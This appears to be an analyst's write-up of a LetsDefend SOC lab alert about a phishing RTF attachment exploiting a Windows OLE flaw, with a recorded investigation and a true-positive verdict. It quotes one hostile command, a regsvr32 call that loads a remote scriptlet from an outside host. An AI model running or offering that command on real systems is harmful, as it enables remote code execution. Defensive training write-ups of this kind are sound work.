LetsDefend SOC336 – Windows OLE Zero-Click RCE (CVE-2025-21298) Analysis
Alert Name: SOC336 – Windows OLE Zero-Click RCE Exploitation Detected
Severity: Critical
Event ID: 314
Event Time: Feb 04, 2025, 04:18 PM
Category: Malware
Base Information
| Field | Value |
|---|---|
| Severity | Critical |
| Event ID | 314 |
| Event Time | Feb 04, 2025, 04:18 PM |
| Rule Name | SOC336 – Windows OLE Zero-Click RCE Exploitation Detected |
| CVE | CVE-2025-21298 |
| Analyst Level | Security Analyst |
| Source IP / SMTP Address | 84.38.130.118 |
| Sender Email | projectmanagement@pm.me |
| Recipient Email | Austin@letsdefend.io |
| Email Subject | Important: Action Required for Upcoming Project Deadline |
| Attachment Name | mail.rtf |
| Attachment Hash (SHA-256) | df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 |
| Device Action | Allowed |
| Trigger Reason | Malicious RTF attachment matching CVE-2025-21298 exploit pattern |
Basic Context
Windows OLE (Object Linking and Embedding) is a Microsoft technology that allows documents to embed or link objects from other applications. Vulnerabilities in OLE can allow attackers to achieve remote code execution without user interaction, often referred to as zero-click exploits.
Key details recorded before investigation:
- Event Time: Feb 04, 2025, 04:18 PM
- Sender: projectmanagement@pm.me
- Recipient: Austin@letsdefend.io
- Attachment: mail.rtf
- Attachment Hash: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
Play Book
Initial Containment and Host Review
Endpoint details for the affected system:
- Hostname: Austin
- Domain: LetsDefend
- IP Address: 172.16.17.137
- OS: Windows 10 (64-bit)
- Primary User: Austin
- Role: Server
- Last Login: Feb 04, 2025, 04:33 PM
The endpoint was immediately placed under containment to prevent further execution or lateral movement during the investigation.
Command Execution Observed
Terminal history revealed the following command execution:
“C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll”
This command is a known living-off-the-land technique abusing regsvr32 to load a remote scriptlet file, enabling code execution without dropping a traditional executable to disk.
Malware Analysis
The attachment hash was analyzed using multiple threat intelligence platforms.
- VirusTotal: Multiple detections confirming malicious behavior
- URLHaus: Associated with active malicious infrastructure
- IBM X-Force Exchange: Classified as malware exploiting Windows OLE
Analysis confirms the RTF document weaponized a Windows OLE vulnerability to trigger remote code execution, leading to the regsvr32-based payload execution.
Email Analysis
Email investigation showed:
- No additional emails sent by the same sender to other users
- No evidence of the recipient forwarding the email internally
- No outbound emails originating from Austin related to this message
This indicates a targeted phishing attempt rather than a broad campaign.
Impact Assessment
- Attack Type: Zero-click remote code execution
- Exploitation Success: Yes
- Initial Access Vector: Malicious RTF email attachment
- Code Execution: Confirmed via regsvr32 abuse
- Lateral Movement: Not observed
- Persistence: Possible, further forensic analysis required
Conclusion
This incident represents a successful exploitation of CVE-2025-21298 using a malicious RTF document leveraging Windows OLE. The attacker achieved remote code execution without requiring user interaction. The affected system was contained promptly, preventing observed lateral spread; however, further environment-wide hunting and forensic analysis are required.
Final Verdict
True Positive – Confirmed Zero-Click RCE Exploitation
The alert accurately detected a critical zero-click Windows OLE remote code execution attack. Immediate containment was successful, but full remediation and threat hunting across the environment are required.